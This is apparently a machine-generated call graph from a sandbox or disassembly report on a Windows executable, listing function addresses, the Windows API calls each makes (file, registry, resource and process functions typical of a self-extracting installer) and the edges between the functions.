SetCurrentDirectoryA 2620->2785 2623->2635 2625->2608 2626 a7597d 34 API calls 2626->2635 2627 a75467 49 API calls 2627->2612 2628 a72630 21 API calls 2628->2635 2630 a757c1 GetWindowsDirectoryA 2630->2635 2631 a7658a CharPrevA 2632 a757e8 GetFileAttributesA 2631->2632 2633 a757fa CreateDirectoryA 2632->2633 2632->2635 2633->2635 2634 a75827 SetFileAttributesA 2634->2635 2635->2619 2635->2620 2635->2623 2635->2625 2635->2626 2635->2628 2635->2630 2635->2631 2635->2634 2636 a75467 49 API calls 2635->2636 2781 a76952 2635->2781 2636->2635 2638 a76249 2637->2638 2639 a76268 2637->2639 2640 a744b9 20 API calls 2638->2640 2641 a7597d 34 API calls 2639->2641 2642 a7625a 2640->2642 2643 a76277 2641->2643 2644 a76285 GetLastError 2642->2644 2645 a76ce0 4 API calls 2643->2645 2646 a7625f 2644->2646 2647 a73013 2645->2647 2646->2643 2647->2297 2647->2314 2649 a73b2d 2648->2649 2649->2649 2650 a73b72 2649->2650 2652 a73b53 2649->2652 2852 a74fe0 2650->2852 2653 a76517 24 API calls 2652->2653 2654 a73b70 2653->2654 2655 a73b7b 2654->2655 2656 a76298 10 API calls 2654->2656 2655->2304 2656->2655 2658 a72583 2657->2658 2659 a72622 2657->2659 2661 a7258b 2658->2661 2662 a725e8 RegOpenKeyExA 2658->2662 2906 a724e0 GetWindowsDirectoryA 2659->2906 2663 a725e3 2661->2663 2665 a7259b RegOpenKeyExA 2661->2665 2662->2663 2664 a72609 RegQueryInfoKeyA 2662->2664 2663->2306 2666 a725d1 RegCloseKey 2664->2666 2665->2663 2667 a725bc RegQueryValueExA 2665->2667 2666->2663 2667->2666 2669 a73bdb 2668->2669 2684 a73bec 2668->2684 2670 a7468f 7 API calls 2669->2670 2670->2684 2671 a73c03 memset 2671->2684 2672 a73d13 2674 a744b9 20 API calls 2672->2674 2673 a7468f 7 API calls 2673->2684 2701 a73d26 2674->2701 2676 a73f4d 2677 a76ce0 4 API calls 2676->2677 2678 a73f60 2677->2678 2678->2311 2679 a73d7b CompareStringA 2680 a73fd7 2679->2680 2679->2684 2680->2676 3004 a72267 2680->3004 2682 a73fab 2685 a744b9 20 API calls 2682->2685 2684->2671 2684->2672 2684->2673 2684->2676 2684->2679 2684->2680 2684->2682 2686 a73f46 LocalFree 2684->2686 2687 a73f1e LocalFree 2684->2687 2693 a73cc7 CompareStringA 2684->2693 2702 a73e10 2684->2702 2914 a71ae8 2684->2914 2954 a7202a memset memset RegCreateKeyExA 2684->2954 2980 a73fef 2684->2980 2689 a73fbe LocalFree 2685->2689 2686->2676 2687->2680 2687->2684 2689->2676 2691 a73f92 2695 a744b9 20 API calls 2691->2695 2692 a73e1f GetProcAddress 2694 a73f64 2692->2694 2692->2702 2693->2684 2697 a744b9 20 API calls 2694->2697 2696 a73fa9 2695->2696 2699 a73f7c LocalFree 2696->2699 2698 a73f75 FreeLibrary 2697->2698 2698->2699 2700 a76285 GetLastError 2699->2700 2700->2701 2701->2676 2702->2691 2702->2692 2703 a73f40 FreeLibrary 2702->2703 2704 a73eff FreeLibrary 2702->2704 2994 a76495 2702->2994 2703->2686 2704->2687 2706 a7468f 7 API calls 2705->2706 2707 a73a55 LocalAlloc 2706->2707 2708 a73a8e 2707->2708 2709 a73a6c 2707->2709 2710 a7468f 7 API calls 2708->2710 2711 a744b9 20 API calls 2709->2711 2712 a73a98 2710->2712 2713 a73a7d 2711->2713 2714 a73ac5 lstrcmpA 2712->2714 2715 a73a9c 2712->2715 2716 a76285 GetLastError 2713->2716 2718 a73b0d LocalFree 2714->2718 2719 a73ada 2714->2719 2717 a744b9 20 API calls 2715->2717 2720 a72f64 2716->2720 2721 a73aad LocalFree 2717->2721 2718->2720 2722 a76517 24 API calls 2719->2722 2720->2279 2720->2314 2721->2720 2723 a73aec LocalFree 2722->2723 2723->2720 2725 a7303c 2724->2725 2725->2314 2727 a7468f 7 API calls 2726->2727 2728 a7417d LocalAlloc 2727->2728 2729 a74195 2728->2729 2730 a741a8 2728->2730 2732 a744b9 20 API calls 2729->2732 2731 a7468f 7 API calls 2730->2731 2733 a741b5 2731->2733 2734 a741a6 2732->2734 2735 a741c5 lstrcmpA 2733->2735 2736 a741b9 2733->2736 2734->2314 2735->2736 2737 a741e6 LocalFree 2735->2737 2738 a744b9 20 API calls 2736->2738 2737->2734 2738->2737 2740 a7171e _vsnprintf 2739->2740 2741 a762c9 FindResourceA 2740->2741 2743 a76353 2741->2743 2744 a762cb LoadResource LockResource 2741->2744 2745 a76ce0 4 API calls 2743->2745 2744->2743 2747 a762e0 2744->2747 2746 a751ca 2745->2746 2746->2584 2746->2585 2748 a76355 FreeResource 2747->2748 2749 a7631b FreeResource 2747->2749 2748->2743 2750 a7171e _vsnprintf 2749->2750 2750->2741 2752 a7551a 2751->2752 2753 a7548a 2751->2753 2823 a758c8 2752->2823 2812 a753a1 2753->2812 2757 a75495 2760 a754c2 GetSystemInfo 2757->2760 2761 a7550c 2757->2761 2765 a75581 2757->2765 2758 a76ce0 4 API calls 2762 a7559a 2758->2762 2759 a7553b CreateDirectoryA 2763 a75577 2759->2763 2764 a75547 2759->2764 2770 a754da 2760->2770 2768 a7658a CharPrevA 2761->2768 2762->2625 2775 a72630 GetWindowsDirectoryA 2762->2775 2769 a76285 GetLastError 2763->2769 2766 a7554d 2764->2766 2765->2758 2766->2765 2767 a7597d 34 API calls 2766->2767 2771 a7555c 2767->2771 2768->2752 2772 a7557c 2769->2772 2770->2761 2773 a7658a CharPrevA 2770->2773 2771->2765 2774 a75568 RemoveDirectoryA 2771->2774 2772->2765 2773->2761 2774->2765 2776 a7266f 2775->2776 2777 a7265e 2775->2777 2779 a76ce0 4 API calls 2776->2779 2778 a744b9 20 API calls 2777->2778 2778->2776 2780 a72687 2779->2780 2780->2612 2780->2627 2782 a769a1 2781->2782 2783 a7696e GetDiskFreeSpaceA 2781->2783 2782->2635 2783->2782 2784 a76989 MulDiv 2783->2784 2784->2782 2786 a759dd GetDiskFreeSpaceA 2785->2786 2787 a759bb 2785->2787 2789 a75ba1 memset 2786->2789 2790 a75a21 MulDiv 2786->2790 2788 a744b9 20 API calls 2787->2788 2793 a759cc 2788->2793 2791 a76285 GetLastError 2789->2791 2790->2789 2792 a75a50 GetVolumeInformationA 2790->2792 2794 a75bbc GetLastError FormatMessageA 2791->2794 2795 a75ab5 SetCurrentDirectoryA 2792->2795 2796 a75a6e memset 2792->2796 2797 a76285 GetLastError 2793->2797 2798 a75be3 2794->2798 2806 a75acc 2795->2806 2799 a76285 GetLastError 2796->2799 2800 a759d1 2797->2800 2801 a744b9 20 API calls 2798->2801 2802 a75a89 GetLastError FormatMessageA 2799->2802 2810 a75b94 2800->2810 2803 a75bf5 SetCurrentDirectoryA 2801->2803 2802->2798 2803->2810 2804 a76ce0 4 API calls 2805 a75c11 2804->2805 2805->2612 2807 a75b0a 2806->2807 2809 a75b20 2806->2809 2808 a744b9 20 API calls 2807->2808 2808->2800 2809->2810 2835 a7268b 2809->2835 2810->2804 2814 a753bf 2812->2814 2813 a7171e _vsnprintf 2813->2814 2814->2813 2815 a7658a CharPrevA 2814->2815 2818 a75415 GetTempFileNameA 2814->2818 2816 a753fa RemoveDirectoryA GetFileAttributesA 2815->2816 2816->2814 2817 a7544f CreateDirectoryA 2816->2817 2817->2818 2819 a7543a 2817->2819 2818->2819 2820 a75429 DeleteFileA CreateDirectoryA 2818->2820 2821 a76ce0 4 API calls 2819->2821 2820->2819 2822 a75449 2821->2822 2822->2757 2824 a758d8 2823->2824 2824->2824 2825 a758df LocalAlloc 2824->2825 2826 a758f3 2825->2826 2828 a75919 2825->2828 2827 a744b9 20 API calls 2826->2827 2829 a75906 2827->2829 2831 a7658a CharPrevA 2828->2831 2830 a76285 GetLastError 2829->2830 2832 a75534 2829->2832 2830->2832 2833 a75931 CreateFileA LocalFree 2831->2833 2832->2759 2832->2766 2833->2829 2834 a7595b CloseHandle GetFileAttributesA 2833->2834 2834->2829 2836 a726e5 2835->2836 2837 a726b9 2835->2837 2839 a7271f 2836->2839 2840 a726ea 2836->2840 2838 a7171e _vsnprintf 2837->2838 2841 a726cc 2838->2841 2843 a7171e _vsnprintf 2839->2843 2849 a726e3 2839->2849 2842 a7171e _vsnprintf 2840->2842 2845 a744b9 20 API calls 2841->2845 2846 a726fd 2842->2846 2847 a72735 2843->2847 2844 a76ce0 4 API calls 2848 a7276d 2844->2848 2845->2849 2850 a744b9 20 API calls 2846->2850 2851 a744b9 20 API calls 2847->2851 2848->2810 2849->2844 2850->2849 2851->2849 2853 a7468f 7 API calls 2852->2853 2854 a74ff5 FindResourceA LoadResource LockResource 2853->2854 2855 a75020 2854->2855 2870 a7515f 2854->2870 2856 a75057 2855->2856 2857 a75029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2855->2857 2874 a74efd 2856->2874 2857->2856 2860 a75060 2862 a744b9 20 API calls 2860->2862 2861 a7507c 2864 a750e8 2861->2864 2871 a75106 2861->2871 2863 a75075 2862->2863 2863->2871 2865 a744b9 20 API calls 2864->2865 2865->2863 2866 a75110 FreeResource 2867 a7511d 2866->2867 2868 a7513a 2867->2868 2869 a75129 2867->2869 2868->2870 2873 a7514c SendMessageA 2868->2873 2872 a744b9 20 API calls 2869->2872 2870->2654 2871->2866 2871->2867 2872->2868 2873->2870 2875 a74f4a 2874->2875 2876 a74fa1 2875->2876 2882 a74980 2875->2882 2878 a76ce0 4 API calls 2876->2878 2879 a74fc6 2878->2879 2879->2860 2879->2861 2883 a74990 2882->2883 2884 a749a5 2883->2884 2885 a749c2 lstrcmpA 2883->2885 2886 a744b9 20 API calls 2884->2886 2887 a749ba 2885->2887 2888 a74a0e 2885->2888 2886->2887 2887->2876 2890 a74b60 2887->2890 2888->2887 2893 a7487a 2888->2893 2891 a74b92 FindCloseChangeNotification 2890->2891 2892 a74b76 2890->2892 2891->2892 2892->2876 2894 a748a2 CreateFileA 2893->2894 2896 a748e9 2894->2896 2897 a74908 2894->2897 2896->2897 2898 a748ee 2896->2898 2897->2887 2901 a7490c 2898->2901 2902 a748f5 CreateFileA 2901->2902 2904 a74917 2901->2904 2902->2897 2903 a74962 CharNextA 2903->2904 2904->2902 2904->2903 2905 a74953 CreateDirectoryA 2904->2905 2905->2903 2907 a72510 2906->2907 2908 a7255b 2906->2908 2909 a7658a CharPrevA 2907->2909 2910 a76ce0 4 API calls 2908->2910 2911 a72522 WritePrivateProfileStringA _lopen 2909->2911 2912 a72569 2910->2912 2911->2908 2913 a72548 _llseek _lclose 2911->2913 2912->2663 2913->2908 2915 a71b25 2914->2915 3018 a71a84 2915->3018 2917 a71b57 2918 a7658a CharPrevA 2917->2918 2920 a71b8c 2917->2920 2918->2920 2919 a766c8 2 API calls 2921 a71bd1 2919->2921 2920->2919 2922 a71d73 2921->2922 2923 a71bd9 CompareStringA 2921->2923 2925 a766c8 2 API calls 2922->2925 2923->2922 2924 a71bf7 GetFileAttributesA 2923->2924 2926 a71d53 2924->2926 2927 a71c0d 2924->2927 2928 a71d7d 2925->2928 2931 a744b9 20 API calls 2926->2931 2927->2926 2933 a71a84 2 API calls 2927->2933 2929 a71d81 CompareStringA 2928->2929 2930 a71df8 LocalAlloc 2928->2930 2929->2930 2938 a71d9b 2929->2938 2930->2926 2932 a71e0b GetFileAttributesA 2930->2932 2951 a71cc2 2931->2951 2934 a71e1d 2932->2934 2952 a71e45 2932->2952 2935 a71c31 2933->2935 2934->2952 2937 a71c50 LocalAlloc 2935->2937 2941 a71a84 2 API calls 2935->2941 2936 a71e89 2940 a76ce0 4 API calls 2936->2940 2937->2926 2939 a71c67 GetPrivateProfileIntA GetPrivateProfileStringA 2937->2939 2938->2938 2942 a71dbe LocalAlloc 2938->2942 2947 a71cf8 2939->2947 2939->2951 2945 a71ea1 2940->2945 2941->2937 2942->2926 2946 a71de1 2942->2946 2945->2684 2948 a7171e _vsnprintf 2946->2948 2949 a71d23 2947->2949 2950 a71d09 GetShortPathNameA 2947->2950 2948->2951 2953 a7171e _vsnprintf 2949->2953 2950->2949 2951->2936 3024 a72aac 2952->3024 2953->2951 2955 a72256 2954->2955 2956 a7209a 2954->2956 2957 a76ce0 4 API calls 2955->2957 2959 a7171e _vsnprintf 2956->2959 2961 a720dc 2956->2961 2958 a72263 2957->2958 2958->2684 2960 a720af RegQueryValueExA 2959->2960 2960->2956 2960->2961 2962 a720e4 RegCloseKey 2961->2962 2963 a720fb GetSystemDirectoryA 2961->2963 2962->2955 2964 a7658a CharPrevA 2963->2964 2965 a7211b LoadLibraryA 2964->2965 2966 a7212e GetProcAddress FreeLibrary 2965->2966 2967 a72179 GetModuleFileNameA 2965->2967 2966->2967 2968 a7214e GetSystemDirectoryA 2966->2968 2969 a721de RegCloseKey 2967->2969 2971 a72177 2967->2971 2970 a72165 2968->2970 2968->2971 2969->2955 2972 a7658a CharPrevA 2970->2972 2971->2971 2973 a721b7 LocalAlloc 2971->2973 2972->2971 2974 a721cd 2973->2974 2975 a721ec 2973->2975 2976 a744b9 20 API calls 2974->2976 2977 a7171e _vsnprintf 2975->2977 2976->2969 2978 a72218 RegSetValueExA RegCloseKey LocalFree 2977->2978 2978->2955 2981 a74016 CreateProcessA 2980->2981 2982 a74106 2980->2982 2983 a740c4 2981->2983 2984 a74041 WaitForSingleObject GetExitCodeProcess 2981->2984 2985 a76ce0 4 API calls 2982->2985 2986 a76285 GetLastError 2983->2986 2992 a74070 2984->2992 2987 a74117 2985->2987 2989 a740c9 GetLastError FormatMessageA 2986->2989 2987->2684 2991 a744b9 20 API calls 2989->2991 2990 a74096 CloseHandle CloseHandle 2990->2982 2993 a740ba 2990->2993 2991->2982 3051 a7411b 2992->3051 2993->2982 2995 a764c2 2994->2995 2996 a7658a CharPrevA 2995->2996 2997 a764d8 GetFileAttributesA 2996->2997 2998 a76501 LoadLibraryA 2997->2998 2999 a764ea 2997->2999 3001 a76508 2998->3001 2999->2998 3000 a764ee LoadLibraryExA 2999->3000 3000->3001 3002 a76ce0 4 API calls 3001->3002 3003 a76513 3002->3003 3003->2702 3005 a72381 3004->3005 3006 a72289 RegOpenKeyExA 3004->3006 3007 a76ce0 4 API calls 3005->3007 3006->3005 3008 a722b1 RegQueryValueExA 3006->3008 3009 a7238c 3007->3009 3010 a722e6 memset GetSystemDirectoryA 3008->3010 3011 a72374 RegCloseKey 3008->3011 3009->2676 3012 a72321 3010->3012 3013 a7230f 3010->3013 3011->3005 3015 a7171e _vsnprintf 3012->3015 3014 a7658a CharPrevA 3013->3014 3014->3012 3016 a7233f RegSetValueExA 3015->3016 3016->3011 3019 a71a9a 3018->3019 3021 a71aba 3019->3021 3023 a71aaf 3019->3023 3037 a7667f 3019->3037 3021->2917 3022 a7667f 2 API calls 3022->3023 3023->3021 3023->3022 3025 a72ad4 GetModuleFileNameA 3024->3025 3026 a72be6 3024->3026 3036 a72b02 3025->3036 3027 a76ce0 4 API calls 3026->3027 3029 a72bf5 3027->3029 3028 a72af1 IsDBCSLeadByte 3028->3036 3029->2936 3030 a72b11 CharNextA CharUpperA 3033 a72b8d CharUpperA 3030->3033 3030->3036 3031 a72bca CharNextA 3032 a72bd3 CharNextA 3031->3032 3032->3036 3033->3036 3035 a72b43 CharPrevA 3035->3036 3036->3026 3036->3028 3036->3030 3036->3031 3036->3032 3036->3035 3042 a765e8 3036->3042 3038 a76689 3037->3038 3039 a766a5 3038->3039 3040 a76648 IsDBCSLeadByte 3038->3040 3041 a76697 CharNextA 3038->3041 3039->3019 3040->3038 3041->3038 3043 a765f4 3042->3043 3043->3043 3044 a765fb CharPrevA 3043->3044 3045 a76611 CharPrevA 3044->3045 3046 a7661e 3045->3046 3047 a7660b 3045->3047 3048 a7663d 3046->3048 3049 a76627 CharPrevA 3046->3049 3050 a76634 CharNextA 3046->3050 3047->3045 3047->3046 3048->3036 3049->3048 3049->3050 3050->3048 3052 a74132 3051->3052 3054 a7412a 3051->3054 3055 a71ea7 3052->3055 3054->2990 3056 a71eba 3055->3056 3057 a71ed3 3055->3057 3058 a7256d 15 API calls 3056->3058 3057->3054 3058->3057 3060 a72026 3059->3060 3061 a71ff0 RegOpenKeyExA 3059->3061 3060->2322 3061->3060 3062 a7200f RegDeleteValueA RegCloseKey 3061->3062 3062->3060 3128 a719e0 3129 a71a24 GetDesktopWindow 3128->3129 3130 a71a03 3128->3130 3137 a743d0 6 API calls 3129->3137 3131 a71a20 3130->3131 3133 a71a16 EndDialog 3130->3133 3135 a76ce0 4 API calls 3131->3135 3133->3131 3136 a71a7e 3135->3136 3138 a74463 SetWindowPos 3137->3138 3140 a76ce0 4 API calls 3138->3140 3141 a71a33 LoadStringA SetDlgItemTextA MessageBeep 3140->3141 3141->3131 3142 a76a20 __getmainargs 3143 a76bef _XcptFilter 3144 a769b0 3145 a769b5 3144->3145 3153 a76fbe GetModuleHandleW 3145->3153 3147 a769c1 __set_app_type __p__fmode __p__commode 3148 a769f9 3147->3148 3149 a76a02 __setusermatherr 3148->3149 3150 a76a0e 3148->3150 3149->3150 3155 a771ef _controlfp 3150->3155 3152 a76a13 3154 a76fcf 3153->3154 3154->3147 3155->3152 3156 a734f0 3157 a73504 3156->3157 3175 a735b8 3156->3175 3159 a735be GetDesktopWindow 3157->3159 3160 a7351b 3157->3160 3157->3175 3158 a73526 3164 a743d0 11 API calls 3159->3164 3161 a7354f 3160->3161 3162 a7351f 3160->3162 3161->3158 3166 a73559 ResetEvent 3161->3166 3162->3158 3165 a7352d TerminateThread EndDialog 3162->3165 3163 a73671 EndDialog 3163->3158 3167 a735d6 3164->3167 3165->3158 3168 a744b9 20 API calls 3166->3168 3169 a735e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3167->3169 3170 a7361d SetWindowTextA CreateThread 3167->3170 3172 a73581 3168->3172 3169->3170 3170->3158 3171 a73646 3170->3171 3173 a744b9 20 API calls 3171->3173 3174 a7359b SetEvent 3172->3174 3176 a7358a SetEvent 3172->3176 3173->3175 3177 a73680 4 API calls 3174->3177 3175->3158 3175->3163 3176->3158 3177->3175 3178 a76ef0 3179 a76f2d 3178->3179 3181 a76f02 3178->3181 3180 a76f27 ?terminate@ 3180->3179 3181->3179 3181->3180 3182 a77270 _except_handler4_common 3183 a76c03 3184 a76c17 _exit 3183->3184 3185 a76c1e 3183->3185 3184->3185 3186 a76c27 _cexit 3185->3186 3187 a76c32 3185->3187 3186->3187 3063 a74cc0 GlobalFree 3064 a76f40 SetUnhandledExceptionFilter 3188 a74bc0 3190 a74c05 3188->3190 3191 a74bd7 3188->3191 3189 a74c1b SetFilePointer 3189->3191 3190->3189 3190->3191 3192 a730c0 3193 a730de CallWindowProcA 3192->3193 3194 a730ce 3192->3194 3195 a730da 3193->3195 3194->3193 3194->3195 3196 a763c0 3197 a76407 3196->3197 3198 a7658a CharPrevA 3197->3198 3199 a76415 CreateFileA 3198->3199 3200 a7643a 3199->3200 3201 a76448 WriteFile 3199->3201 3203 a76ce0 4 API calls 3200->3203 3202 a76465 CloseHandle 3201->3202 3202->3200 3205 a7648f 3203->3205 3206 a73100 3207 a73111 3206->3207 3208 a731b0 3206->3208 3210 a7311d 3207->3210 3212 a73149 GetDesktopWindow 3207->3212 3209 a731b9 SendDlgItemMessageA 3208->3209 3211 a73141 3208->3211 3209->3211 3210->3211 3213 a73138 EndDialog 3210->3213 3214 a743d0 11 API calls 3212->3214 3213->3211 3215 a7315d 6 API calls 3214->3215 3215->3211 3216 a74200 3217 a7421e 3216->3217 3218 a7420b SendMessageA 3216->3218 3218->3217 3065 a74cd0 3066 a74cf4 3065->3066 3067 a74d0b 3065->3067 3068 a74d02 3066->3068 3069 a74b60 FindCloseChangeNotification 3066->3069 3067->3068 3071 a74dcb 3067->3071 3074 a74d25 3067->3074 3070 a76ce0 4 API calls 3068->3070 3069->3068 3073 a74e95 3070->3073 3072 a74dd4 SetDlgItemTextA 3071->3072 3075 a74de3 3071->3075 3072->3075 3074->3068 3088 a74c37 3074->3088 3075->3068 3093 a7476d 3075->3093 3078 a74e38 3078->3068 3080 a74980 25 API calls 3078->3080 3082 a74e56 3080->3082 3081 a74b60 FindCloseChangeNotification 3083 a74d99 SetFileAttributesA 3081->3083 3082->3068 3084 a74e64 3082->3084 3083->3068 3102 a747e0 LocalAlloc 3084->3102 3087 a74e6f 3087->3068 3089 a74c88 3088->3089 3090 a74c4c DosDateTimeToFileTime 3088->3090 3089->3068 3089->3081 3090->3089 3091 a74c5e LocalFileTimeToFileTime 3090->3091 3091->3089 3092 a74c70 SetFileTime 3091->3092 3092->3089 3111 a766ae GetFileAttributesA 3093->3111 3095 a7477b 3095->3078 3096 a747cc SetFileAttributesA 3098 a747db 3096->3098 3098->3078 3099 a76517 24 API calls 3100 a747b1 3099->3100 3100->3096 3100->3098 3101 a747c2 3100->3101 3101->3096 3103 a747f6 3102->3103 3104 a7480f LocalAlloc 3102->3104 3105 a744b9 20 API calls 3103->3105 3107 a7480b 3104->3107 3108 a74831 3104->3108 3105->3107 3107->3087 3109 a744b9 20 API calls 3108->3109 3110 a74846 LocalFree 3109->3110 3110->3107 3112 a74777 3111->3112 3112->3095 3112->3096 3112->3099 3113 a74ad0 3121 a73680 3113->3121 3116 a74aee WriteFile 3118 a74b0f 3116->3118 3119 a74b14 3116->3119 3117 a74ae9 3119->3118 3120 a74b3b SendDlgItemMessageA 3119->3120 3120->3118 3122 a73691 MsgWaitForMultipleObjects 3121->3122 3123 a736a9 PeekMessageA 3122->3123 3124 a736e8 3122->3124 3123->3122 3125 a736bc 3123->3125 3124->3116 3124->3117 3125->3122 3125->3124 3126 a736c7 DispatchMessageA 3125->3126 3127 a736d1 PeekMessageA 3125->3127 3126->3127 3127->3125 3219 a73210 3220 a73227 3219->3220 3221 a7328e EndDialog 3219->3221 3222 a73235 3220->3222 3223 a733e2 GetDesktopWindow 3220->3223 3238 a73239 3221->3238 3227 a732dd GetDlgItemTextA 3222->3227 3228 a7324c 3222->3228 3222->3238 3225 a743d0 11 API calls 3223->3225 3226 a733f1 SetWindowTextA SendDlgItemMessageA 3225->3226 3229 a7341f GetDlgItem EnableWindow 3226->3229 3226->3238 3230 a73366 3227->3230 3239 a732fc 3227->3239 3231 a732c5 EndDialog 3228->3231 3232 a73251 3228->3232 3229->3238 3234 a744b9 20 API calls 3230->3234 3231->3238 3233 a7325c LoadStringA 3232->3233 3232->3238 3235 a73294 3233->3235 3236 a7327b 3233->3236 3234->3238 3257 a74224 LoadLibraryA 3235->3257 3242 a744b9 20 API calls 3236->3242 3239->3230 3241 a73331 GetFileAttributesA 3239->3241 3244 a7333f 3241->3244 3245 a7337c 3241->3245 3242->3221 3243 a732a5 SetDlgItemTextA 3243->3236 3243->3238 3247 a744b9 20 API calls 3244->3247 3246 a7658a CharPrevA 3245->3246 3248 a7338d 3246->3248 3249 a73351 3247->3249 3251 a758c8 27 API calls 3248->3251 3249->3238 3250 a7335a CreateDirectoryA 3249->3250 3250->3230 3250->3245 3252 a73394 3251->3252 3252->3230 3253 a733a4 3252->3253 3254 a733c7 EndDialog 3253->3254 3255 a7597d 34 API calls 3253->3255 3254->3238 3256 a733c3 3255->3256 3256->3238 3256->3254 3258 a74246 GetProcAddress 3257->3258 3259 a743b2 3257->3259 3260 a743a4 FreeLibrary 3258->3260 3261 a7425d GetProcAddress 3258->3261 3263 a744b9 20 API calls 3259->3263 3260->3259 3261->3260 3262 a74274 GetProcAddress 3261->3262 3262->3260 3264 a7428b 3262->3264 3265 a7329d 3263->3265 3266 a74295 GetTempPathA 3264->3266 3270 a742e1 3264->3270 3265->3238 3265->3243 3267 a742ad 3266->3267 3267->3267 3268 a742b4 CharPrevA 3267->3268 3269 a742d0 CharPrevA 3268->3269 3268->3270 3269->3270 3271 a74390 FreeLibrary 3270->3271 3271->3265 3272 a74a50 3273 a74a9f ReadFile 3272->3273 3274 a74a66 3272->3274 3275 a74abb 3273->3275 3274->3275 3276 a74a82 memcpy 3274->3276 3276->3275 3277 a73450 3278 a734d3 EndDialog 3277->3278 3279 a7345e 3277->3279 3280 a7346a 3278->3280 3281 a73465 3279->3281 3282 a7349a GetDesktopWindow 3279->3282 3281->3280 3285 a7348c EndDialog 3281->3285 3283 a743d0 11 API calls 3282->3283 3284 a734ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3283->3284 3284->3280 3285->3280

                              Callgraph

                              • Executed
                              • Not Executed
                              • Opacity -> Relevance
                              • Disassembly available
                              callgraph 0 Function_00A71EA7 103 Function_00A7256D 0->103 1 Function_00A76FA5 113 Function_00A7724D 1->113 2 Function_00A718A3 39 Function_00A76CE0 2->39 47 Function_00A717EE 2->47 3 Function_00A73BA2 16 Function_00A744B9 3->16 17 Function_00A76285 3->17 19 Function_00A71781 3->19 24 Function_00A7468F 3->24 28 Function_00A76495 3->28 3->39 43 Function_00A73FEF 3->43 49 Function_00A71AE8 3->49 74 Function_00A7202A 3->74 97 Function_00A72267 3->97 4 Function_00A772A2 5 Function_00A753A1 23 Function_00A71680 5->23 26 Function_00A7658A 5->26 5->39 93 Function_00A7171E 5->93 6 Function_00A76FA1 7 Function_00A755A0 7->16 7->17 7->19 7->24 7->26 7->39 77 Function_00A72630 7->77 88 Function_00A76517 7->88 96 Function_00A75467 7->96 110 Function_00A7597D 7->110 117 Function_00A76952 7->117 8 Function_00A74CA0 9 Function_00A766AE 10 Function_00A72AAC 10->23 10->39 51 Function_00A765E8 10->51 66 Function_00A717C8 10->66 11 Function_00A72CAA 11->2 11->16 11->24 30 Function_00A72390 11->30 32 Function_00A75C9E 11->32 11->39 46 Function_00A736EE 11->46 11->88 12 Function_00A752B6 12->19 12->30 36 Function_00A71FE1 12->36 12->39 12->51 13 Function_00A716B3 13->19 14 Function_00A769B0 15 Function_00A76FBE 14->15 44 Function_00A771EF 14->44 84 Function_00A77000 14->84 108 Function_00A76C70 14->108 116 Function_00A76F54 15->116 16->23 16->39 63 Function_00A767C9 16->63 91 Function_00A7681F 16->91 16->93 18 Function_00A71A84 109 Function_00A7667F 18->109 20 Function_00A76380 21 Function_00A73680 22 Function_00A74980 22->16 111 Function_00A7487A 22->111 23->19 25 Function_00A7268B 25->16 25->39 25->93 26->13 27 Function_00A72A89 28->19 28->26 28->39 29 Function_00A76793 30->13 30->23 30->26 30->30 30->39 31 Function_00A71F90 31->0 31->16 31->39 32->16 32->23 32->26 38 Function_00A731E0 32->38 32->39 65 Function_00A766C8 32->65 75 Function_00A76E2A 32->75 87 Function_00A75C17 32->87 32->109 33 Function_00A74E99 33->23 34 Function_00A76298 34->39 34->93 35 Function_00A751E5 35->16 35->17 35->24 37 Function_00A74FE0 37->16 37->24 56 Function_00A74EFD 37->56 52 Function_00A76CF0 39->52 40 Function_00A724E0 40->26 40->39 41 Function_00A719E0 41->39 69 Function_00A743D0 41->69 42 Function_00A747E0 42->16 42->23 43->16 43->17 43->39 95 Function_00A7411B 43->95 45 Function_00A76BEF 46->16 46->27 46->39 50 Function_00A728E8 46->50 46->63 46->91 47->39 48 Function_00A770EB 49->10 49->13 49->16 49->18 49->19 49->23 49->26 49->39 49->65 49->93 50->27 106 Function_00A72773 50->106 53 Function_00A734F0 53->16 53->21 53->69 54 Function_00A76EF0 55 Function_00A770FE 56->22 56->39 99 Function_00A74B60 56->99 57 Function_00A72BFB 57->11 57->12 57->31 94 Function_00A72F1D 57->94 58 Function_00A766F9 59 Function_00A74CC0 60 Function_00A74BC0 61 Function_00A730C0 62 Function_00A763C0 62->19 62->26 62->39 63->29 64 Function_00A758C8 64->16 64->17 64->23 64->26 114 Function_00A76648 65->114 67 Function_00A74AD0 67->21 68 Function_00A74CD0 68->22 68->33 68->39 68->42 76 Function_00A74C37 68->76 81 Function_00A74702 68->81 68->99 104 Function_00A7476D 68->104 69->39 70 Function_00A73B26 70->34 70->37 70->88 71 Function_00A74224 71->16 71->23 72 Function_00A77120 73 Function_00A76A20 74->16 74->26 74->39 74->93 75->52 77->16 77->39 78 Function_00A73A3F 78->16 78->17 78->24 78->88 79 Function_00A76C3F 80 Function_00A76C03 80->113 81->13 81->23 82 Function_00A73100 82->69 83 Function_00A74200 85 Function_00A7490C 86 Function_00A77208 88->16 89 Function_00A77010 90 Function_00A73210 90->16 90->26 90->64 90->69 90->71 90->110 91->39 91->58 92 Function_00A7621E 92->16 92->17 92->39 92->110 94->3 94->7 94->16 94->17 94->26 94->35 94->39 94->70 94->78 94->92 98 Function_00A75164 94->98 94->103 105 Function_00A74169 94->105 95->0 96->5 96->17 96->19 96->23 96->26 96->39 96->64 96->110 97->26 97->39 97->93 98->16 98->24 98->34 100 Function_00A76A60 100->57 100->79 100->86 101 Function_00A77060 100->101 100->113 115 Function_00A77155 100->115 101->72 101->89 102 Function_00A76760 103->40 104->9 104->88 105->16 105->24 106->19 106->23 106->26 106->39 107 Function_00A77270 109->114 110->16 110->17 110->25 110->39 111->85 112 Function_00A76F40 116->86 116->113 118 Function_00A74A50 119 Function_00A73450 119->69

                              Control-flow Graph

                              • Executed
                              • Not Executed
